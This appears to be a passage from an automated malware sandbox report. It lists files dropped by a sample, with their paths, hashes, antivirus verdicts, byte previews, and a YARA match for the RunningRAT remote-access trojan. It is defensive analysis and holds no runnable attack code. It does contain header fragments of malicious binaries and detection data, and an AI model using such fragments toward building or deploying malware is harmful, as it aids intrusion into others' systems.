                                                                                                              SHA-512:473A8893C79F1FB7A9E120FFFF31F23CB7D83C09BF9C7356C8BB80C975858E16A427DCCA628D4C96DFA7BD4B285D8FE0EC869CF73E6F78AA1E8462A70DC5B17E
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~.......p$...........@...........................$...........@.........................p...<............@ ......................P#.....@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@..B.....u...P...p$..B...4$............. ...........................................................................................................................................................................................................................................................

                                                                                                              C:\Program Files\7-Zip\Uninstall.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):31744
                                                                                                              Entropy (8bit):6.366075585544415
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:uWQ3655Kv1X/qY1MSdlIQGPL4vzZq2o9W7GsxBbPr:uHqaNrFdlDGCq2iW7z
                                                                                                              MD5:B4E43FE71C2D3E1EE806FA4CE9E78C13
                                                                                                              SHA1:43E9681F79AE68CCA8119CBE1028795BCE3FA6C0
                                                                                                              SHA-256:7284D7F7B495D6A858B295ED3D70F9D8D6A22068194964582EC2F66F8964EEB3
                                                                                                              SHA-512:61B685A964E53226EB59275BE524C9E2325EA9BC4BAC96F77156717518D10199643D153DA5CA1BC9C0F4E42A0853591A9E932696536AB73AA908C1BA85AFE4FF
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.6...X...X...X.x.R...X..V...X.x.\...X......X...Y.W.X......X.!.R...X...^...X.Rich..X.................PE..L...pN.d........../......V...@.......p.......0....@.........................................................................$9.......`...............................................................................0...............................text............................... ..`.rdata.......0......................@..@.data...X....@.......(..............@....rsrc........`.......*..............@..@.EpN.uZ..P...p...B...:.............. ...................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_XekSuT.exe_24c27fbdbba447a89abf50ef7e2ed5439a15e51d_dc0ba3f8_8105e1f2-2929-4267-abb0-a6608c1169c0\Report.wer

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):65536
                                                                                                              Entropy (8bit):0.923185171504473
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:wfFNbsxhnj7afzQXIDcQNc6UkcEUscw3US3B+HbHg/5ksS/YyNlIcIPkMhFSDOyn:e3b60zBNYjE/hzuiF5Z24IO8t
                                                                                                              MD5:F0AA0BFCB93467751D00632007E5999B
                                                                                                              SHA1:83EC6E350784C641B51DAF59DA6110BE8465D932
                                                                                                              SHA-256:080B9367A38EA12E878D5AE2CABFA8C118E931D6FF7F404CDE8944D1830C4E41
                                                                                                              SHA-512:DF1BC73C85C5713EE6A055FC15ADA9C66806D5F366DA1EF5FBE081466A313C74D00A7ED335B3F3E7C0EEEF4E5A366073FCA061CECCD145898B524134521F2D47
                                                                                                              Malicious:false
                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.6.6.9.5.4.3.5.4.1.5.7.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.6.6.9.5.4.3.9.7.9.0.6.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.0.5.e.1.f.2.-.2.9.2.9.-.4.2.6.7.-.a.b.b.0.-.a.6.6.0.8.c.1.1.6.9.c.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.c.e.1.8.3.4.-.d.7.1.2.-.4.1.8.9.-.9.4.3.c.-.d.8.3.f.e.7.4.6.a.3.b.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.X.e.k.S.u.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.2.4.-.0.0.0.1.-.0.0.1.4.-.7.c.1.c.-.a.6.2.b.e.9.2.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.3.9.c.9.2.8.8.0.c.1.f.5.b.6.d.4.e.9.0.0.8.e.2.8.1.a.0.6.a.5.c.0.0.0.0.f.f.f.f.!.0.0.0.0.9.9.e.e.3.1.c.d.4.b.0.d.6.a.4.b.6.2.7.7.9.d.a.3.6.e.0.e.e.e.c.d.d.8.0.5.8.9.f.c.!.X.e.k.S.u.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.3.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD362.tmp.dmp

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:Mini DuMP crash report, 15 streams, Tue Oct 29 09:59:03 2024, 0x1205a4 type
                                                                                                              Category:dropped
                                                                                                              Size (bytes):145430
                                                                                                              Entropy (8bit):1.7774967696149961
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:4hUZh3Jx9IYtVIfQHmn2v3sMsJFfJLVM8wJ:/EuqIHbv8MsJFfJLVM8wJ
                                                                                                              MD5:CB04677561BDCEF17F7B4484C862DB4F
                                                                                                              SHA1:85CAB31832F7D1D922BCB4C729EC55D0E3D54B49
                                                                                                              SHA-256:6438AB196743ED43ACCCF2CE259A9DFF63F5DDAAB30C12F5A05586F189168C90
                                                                                                              SHA-512:B1E2263F89921F2053CF11456BDB79716D158D8F1886C73EAAB506F7EF83D17B1353F6606AFD25532B31C1F6D97E3062829B214A022BE11706A3B1B7938CA0B6
                                                                                                              Malicious:false
                                                                                                              Preview:MDMP..a..... ........ g............D...............X...........0............K..........`.......8...........T............7..............,............ ..............................................................................eJ....... ......GenuineIntel............T.......$.... g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD45D.tmp.WERInternalMetadata.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):6264
                                                                                                              Entropy (8bit):3.7171214775947585
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:RSIU6o7wVetbK66SGxY2Il3Meu5aMQUO89bCbgsfnWm:R6l7wVeJK66SGxY2/pDO89bCbgsfnWm
                                                                                                              MD5:F16F7CE1D7433D048E390E09BB444948
                                                                                                              SHA1:4555E5DB76047FAC6E265AEA9487380CB7C2865D
                                                                                                              SHA-256:348B586D0D1601598F5DAC32AC7FCD2CE47162E7563F81B2D6EF653D64EFF88B
                                                                                                              SHA-512:4C89413D693FD4F99136D8E3F202858F6CB7CE09B2141C13BFFE040C5E161F350CA75B469908D66C319858F97F4B68AF1B62C2D89B845E0F16C334E692400A74
                                                                                                              Malicious:false
                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.1.8.0.<./.P.i.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD48D.tmp.xml

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4551
                                                                                                              Entropy (8bit):4.452302697276403
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:cvIwWl8zs8uJg77aI9s/WpW8VYeYm8M4JENFx+q8YaPg3dd:uIjf8kI7Wu7V6JIMPg3dd
                                                                                                              MD5:79924F21F29EC0A463CB7CB783F882E4
                                                                                                              SHA1:FF30B53E73FC7B54046CEF328C17B6DD58CD2F55
                                                                                                              SHA-256:2B67795A95C244E5D82406D751AB29D01ED2DD1F0E3814443293C6F93D926CB2
                                                                                                              SHA-512:AD4C6728B2E9EA4E8B4F9F4623953382CBFC9723370DC1346A1544859504EBB457F0C01B381B13C404AF9638B8181F6C8D6F0A6DCD3DAF4112FEA58AF47A4C91
                                                                                                              Malicious:false
                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="564541" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD49B.tmp.csv

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):81388
                                                                                                              Entropy (8bit):3.087601366047006
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:eU1sfPSs4QIvNwzfYAeT8ps21VM63gUqMBhZY/Xid/8YH0npo/:TkSs4/Nwzs8hvMUgU3Bhm/XitL0npo/
                                                                                                              MD5:7D5C7E4C444D432D1EA6B0BAC1EEC4E4
                                                                                                              SHA1:49B47BFA0D498AC5F313F89DC9746F73DAA3D724
                                                                                                              SHA-256:A1B8DC99A7440A66238E5E09768CBEF7FF4381AB5A5908DB88B345093323F102
                                                                                                              SHA-512:9CEF3A1FABD23297D6A547292F598328FD16D462DE4CF2F3F6FF1C5588AA90E5DB44A0415AFF63440EF1AFF06D59387EDA3CB0C8C4E8732EA51AA09E3CD35DA9
                                                                                                              Malicious:false
                                                                                                              Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERD4EA.tmp.txt

                                                                                                              Download File
                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):13340
                                                                                                              Entropy (8bit):2.6866353511897088
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:96:TiZYWnPoDJPKYsYhWeH4YEZiEztEi9x4tmzwOrlLwHajCGMKpKI+3v3:2ZDvLakuHajCGMKp9+3v3
                                                                                                              MD5:66CCD8EB5BE964C5EA8BEC9C9E18920F
                                                                                                              SHA1:233C91912BE43C2415E9BDD0B16596B70DAC5F23
                                                                                                              SHA-256:FC987F9A02130C8E5B0444DB94986895D415B4E4BC93B48B76558DBA654C35A9
                                                                                                              SHA-512:2F2AEEFA0232D063631A92A2EC5C9A20C9E304166AB68B5BBBD10E6801583FF0E2CEBCE2C5CCED9215153FF473867EA528F42A3713C9ABBFA57AE3BA68EB4ED6
                                                                                                              Malicious:false
                                                                                                              Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k2[1].rar

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k3[1].rar

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k4[1].rar

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k5[1].rar

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Temp\1B9B3769.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Temp\3B2804ED.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Temp\4DBC4E37.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Temp\6011859.dll

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\gE4NVCZDRk.exe
                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):26112
                                                                                                              Entropy (8bit):6.077721048640773
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:8T9IWqIwt10zr6lXYhCRdkyurLmC2S1xJrQcWrH/RUAMO0MY0holUxHdHq4tKDES:8ht+Izr6pqRrLuS1vzWpaGZHdFYDG
                                                                                                              MD5:DB598538E7A70B73298F6424AE507E02
                                                                                                              SHA1:D06A04FB9CA1BB8DA5974870196AE5C0EADC1FA9
                                                                                                              SHA-256:CC4AB82995B0C0C827E99870948EF6A1371D4D1ED6D167A087C0D5C123D0F15E
                                                                                                              SHA-512:EBEDB94E2BA77836317596557FB447E6ABC78FECFAFCE8DE900D70202994FE829459665E0DEC8813C51039B64A12D08258BC6074324B729994B61E8467F5E3FA
                                                                                                              Malicious:true
                                                                                                              Yara Hits:
                                                                                                              • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\Users\user\AppData\Local\Temp\6011859.dll, Author: ditekSHen
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: uHmFQqHIIA.exe, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........d...d...d..#G...d..x...d..{...d..zx...d..{...d..{...d...d...d...d..d..:k...d...B...d...D...d..Rich.d..........PE..L....w.T...........!.....@...$.......N.......P......................................................................pZ.......T..d............................p.......................................................P..$............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........`.......P..............@....reloc..d....p.......^..............@..B........................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\704A612B.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Temp\705B3FD0.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\AppData\Local\Temp\XekSuT.exe
                                                                                                              File Type:ASCII text
                                                                                                              Category:modified
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):1.5
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Nv:9
                                                                                                              MD5:D3B07384D113EDEC49EAA6238AD5FF00
                                                                                                              SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                                                                                                              SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                                                                                                              SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                                                                                                              Malicious:false
                                                                                                              Preview:foo.

                                                                                                              C:\Users\user\AppData\Local\Temp\XekSuT.exe

                                                                                                              Download File
                                                                                                              Process:C:\Users\user\Desktop\gE4NVCZDRk.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):15872
                                                                                                              Entropy (8bit):7.031113762428177
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:384:7XZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:1QGPL4vzZq2o9W7GsxBbPr
                                                                                                              MD5:56B2C3810DBA2E939A8BB9FA36D3CF96
                                                                                                              SHA1:99EE31CD4B0D6A4B62779DA36E0EEECDD80589FC
                                                                                                              SHA-256:4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
